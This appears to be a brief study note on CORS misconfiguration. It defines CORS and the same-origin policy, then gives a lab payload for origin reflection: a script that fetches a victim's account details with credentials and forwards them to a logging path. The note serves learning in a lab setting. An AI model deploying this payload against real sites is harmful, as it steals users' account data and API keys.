CORS
Definition: CORS (Cross-Origin Resource Sharing) is a browser mechanism that allows controlled access to resources from different domains.
Purpose: It extends the same-origin policy (SOP) to enable more flexible interactions between websites.
Vulnerabilities: Poorly configured CORS policies can lead to cross-domain attacks, such as data theft or unauthorized access.
Limitations: CORS does not protect against all types of cross-origin attacks, including CSRF (Cross-Site Request Forgery).
Same-Origin Policy: SOP restricts how a document or script can interact with resources from different origins to prevent malicious activities.
Relaxation Mechanism: CORS allows a controlled relaxation of SOP using HTTP headers that specify trusted origins and access permissions.
Basic Origin refelction
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='/log?key='+this.responseText;
};
</script>Null origin allowed
Ajax steal api key
Last updated